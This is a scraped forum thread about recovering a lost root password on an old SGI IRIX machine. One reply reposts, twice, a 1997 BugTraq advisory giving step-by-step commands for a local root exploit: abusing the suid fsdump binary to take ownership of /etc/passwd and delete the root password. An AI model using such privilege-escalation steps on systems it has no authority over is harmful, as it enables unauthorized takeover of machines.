Tek-Tips is the largest IT community on the Internet today!
Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!
-
Congratulations SkipVought on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!
Loss of Root password
- Thread starter stevea
- Start date
Guest_imported
New member
- Jan 1, 1970
- 0
- 0
- 0
At the startup, select "system maintenance"<br>select install new software<br>select method (mostly CDrom)<br>wait untill the installation tools are loaded<br>go to the admin options<br>select "start chrootedshell" (or something similiar)<br>In the shell type passwd<br>fill in a new password, confirm it.<br><br>Root password is changed.<br><br>
hehehe.. That won't work you know...
The trouble with 5.3 (I gather you're running an Indigo)
is that it doesn't have a password jumper on the mainboard (like Indy does).
Once your password is lost, you are too.. At least that's what I was told
The trouble with 5.3 (I gather you're running an Indigo)
is that it doesn't have a password jumper on the mainboard (like Indy does).
Once your password is lost, you are too.. At least that's what I was told
NewStudentOfTech
Technical User
So Stevea,
Did it work? Which method did you use? I actually have an Indy and forgot my password.
Was Sim3 saying to reload the system software?
Please reply to me w/any help.
Did it work? Which method did you use? I actually have an Indy and forgot my password.
Was Sim3 saying to reload the system software?
Please reply to me w/any help.
Here's an article from BugTraQ regarding Irix 5.3 and it's huge (imho) holes in fsdump. Keep in mind this requires you to have a regular (non-uid0) account that you can access.
Ok. Well, yet another IRIX 5.3 root exploit.
Of course, the major problem here is that IRIX allow users to
give away ownership of files. Without that, this could only
be used for changing the permissions on file so that you could read
and modify.
The system (an Indy):
IRIX irix 5.3 11091812 IP22 mips
irix% ls -la /var/rfindd/fsdump
---s--x--x 1 root sys 62032 Jul 25 1995 /var/rfindd/fsdump
What tipped me off that it was exploitable was the fact that it
was a protected suid binary (---s--x--x). I thought: if someone at
SGI is being careful to not let non-root users read the binary,
then it *must* be packed with holes...
So, I'm just a normal user today...
irix% id
uid=1799(csh) gid=500(users)
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
And now I've got root access...
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2riginal nobody uid:/dev/null:/dev/null
Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
All you have to do is edit off the garbage from the passwd file,
delete the encrypted root password and reset the perms on the passwd file.
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#
That's it.
(Heck, you don't even have to remove the garbage from the passwd file.)
This can be used to access pretty much any file on the system
which is currently group owned...
fun, fun, fun until SGI takes the bugs away... ;-) (right)
Ok. Well, yet another IRIX 5.3 root exploit.
Of course, the major problem here is that IRIX allow users to
give away ownership of files. Without that, this could only
be used for changing the permissions on file so that you could read
and modify.
The system (an Indy):
IRIX irix 5.3 11091812 IP22 mips
irix% ls -la /var/rfindd/fsdump
---s--x--x 1 root sys 62032 Jul 25 1995 /var/rfindd/fsdump
What tipped me off that it was exploitable was the fact that it
was a protected suid binary (---s--x--x). I thought: if someone at
SGI is being careful to not let non-root users read the binary,
then it *must* be packed with holes...
So, I'm just a normal user today...
irix% id
uid=1799(csh) gid=500(users)
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
And now I've got root access...
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2
riginal nobody uid:/dev/null:/dev/nullTue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
All you have to do is edit off the garbage from the passwd file,
delete the encrypted root password and reset the perms on the passwd file.
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#
That's it.
(Heck, you don't even have to remove the garbage from the passwd file.)
This can be used to access pretty much any file on the system
which is currently group owned...
fun, fun, fun until SGI takes the bugs away... ;-) (right)
- Status
Similar threads
- Question